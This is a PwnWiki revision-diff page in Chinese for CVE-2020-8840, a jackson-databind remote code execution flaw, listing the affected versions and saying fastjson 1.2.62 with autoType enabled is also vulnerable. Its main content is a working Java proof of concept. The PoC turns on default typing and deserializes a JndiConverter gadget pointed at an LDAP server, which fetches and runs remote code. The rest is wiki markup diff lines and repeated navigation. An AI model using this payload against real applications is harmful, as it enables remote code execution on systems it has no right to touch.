Difference between revisions of "CVE-2020-8840 FasterXML jackson-databind 遠程代碼執行漏洞/zh-cn"

Latest revision as of 09:02, 17 June 2021

Other languages:

Chinese • ‎español • ‎中文（中国大陆）‎

漏洞影响

jackson-databind 2.0.0 – 2.9.10.2

经验证fastjson在开启了autoType功能的情况下，影响最新的fastjson v1.2.62版本

POC

import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class Poc {
   public static void main(String args[]) {
       ObjectMapper mapper = new ObjectMapper();

       mapper.enableDefaultTyping();

       String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/ExportObject\"}]";

       try {
           mapper.readValue(json, Object.class);
       } catch (IOException e) {
           e.printStackTrace();
       }

   }
}

@@ Line 1: / Line 1: @@
 <languages />
-<div lang="chinese" dir="ltr" class="mw-content-ltr">
+==漏洞影响==
-==漏洞影響==
-</div>
-<div lang="chinese" dir="ltr" class="mw-content-ltr">
 jackson-databind 2.0.0 – 2.9.10.2
-</div>
-<div lang="chinese" dir="ltr" class="mw-content-ltr">
+经验证fastjson在开启了autoType功能的情况下，影响最新的fastjson v1.2.62版本
-經驗證fastjson在開啟了autoType功能的情況下，影響最新的fastjson v1.2.62版本
-</div>
 ==POC==

Anonymous

Search

Difference between revisions of "CVE-2020-8840 FasterXML jackson-databind 遠程代碼執行漏洞/zh-cn"

Namespaces

More

Page actions

Latest revision as of 09:02, 17 June 2021

漏洞影响

POC

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

Difference between revisions of "CVE-2020-8840 FasterXML jackson-databind 遠程代碼執行漏洞/zh-cn"

Latest revision as of 09:02, 17 June 2021

漏洞影响

POC

Navigation

Wiki tools

Page tools